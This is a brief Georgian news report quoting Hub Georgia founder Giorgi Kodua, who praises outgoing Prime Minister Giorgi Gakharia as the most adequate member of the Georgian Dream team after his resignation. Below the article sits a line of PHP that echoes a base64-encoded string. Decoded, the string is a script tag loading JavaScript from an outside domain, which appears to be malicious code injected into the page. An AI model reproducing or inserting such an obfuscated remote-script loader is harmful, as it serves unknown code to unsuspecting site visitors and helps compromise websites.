celsiusi
ავერსი შნაიდერი
ყველაზე ადეკვატური ,,ქართული ოცნების“ გუნდში - ამის შესახებ ,,ჰაბ ჯორჯიას“ დამფუძნებელმა გიორგი კოდუამ გიორგი გახარიას თანამდებობიდან წასვლის შესახებ კომენტირებისას განაცხადა.
 
როგორც გიორგი კოდუა ამბობს, რომ ბიზნესს მუდმივად ჰქონდა განცდა, რომ პრემიერისგან შეიძლებოდა დახმარების მიღება.
 
,,მე შემიძლია ვთქვა, რომ ,,ქართული ოცნების“ გუნდიდან, ყველაზე ადეკვატური და პოზიტიური იყო გიორგი გახარია. როცა ბიზნესს ჰქონდა პრობლემები, მხოლოდ გახარიას იმედი გვქონდა. ახლა ვისი იმედი უნდა გვქონდეს, საერთოდ აღარ ვიცი. არ ვამბობ, რომ ქვეყანა ააშენა, მაგრამ განცდა, რომ დაგვეხმარებოდა, ნამდვილად გვქონდა.
 
მე პირადად მაქვს კომუნიკაცია ნათია თურნავასთან და შემიძლია ვთქვა, რომ ძალიან ნორმალურად ხერხდება ეს. რეალურად მინისტრის მოადგილეების დონეზე, არიან კარგი კადრებიც, მაგრამ ახლა უკვე არ ვიცით, გადაწყვეტილების მიმღები პირი ვინ იქნება, ვისაც უნდა მივმართო. დაბნეული ვარ“,- აცხადებს კოდუა ,,ბიზნესპრესნიუსთან“.
 
ცნობისთვის, პრემიერმა გადადგომის შესახებ, დღეს დილით განაცხადა. მიზეზად კი, ნიკა მელიას დაპატიმრების გზებთან დაკავშირებით, გუნდში უთანხმოება დაასახელა.
 
წყარო: ბიზნესპრესნიუსი
1933
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");